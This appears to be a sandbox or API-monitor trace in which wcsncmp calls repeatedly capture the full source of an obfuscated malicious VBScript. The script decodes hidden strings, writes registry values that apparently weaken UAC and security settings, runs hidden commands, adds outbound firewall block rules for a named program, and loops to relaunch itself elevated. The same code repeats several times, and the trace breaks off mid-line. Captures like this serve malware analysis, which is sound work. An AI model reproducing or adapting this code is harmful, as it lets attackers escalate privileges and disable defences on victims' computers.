ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.942] wcsncmp (_String1="= Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.942] wcsncmp (_String1=" Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.942] wcsncmp (_String1="Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64 [0222.943] wcsncmp (_String1="id(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 